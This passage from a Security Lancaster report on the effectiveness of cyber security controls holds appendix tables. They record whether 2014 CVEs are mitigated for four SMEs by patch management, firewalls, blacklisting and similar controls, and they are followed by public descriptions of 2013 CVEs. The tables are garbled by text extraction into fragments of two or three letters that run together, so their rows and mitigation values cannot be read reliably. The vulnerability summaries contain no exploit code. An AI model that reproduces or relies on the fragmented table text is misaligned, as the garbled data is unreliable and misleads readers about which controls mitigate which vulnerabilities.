on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
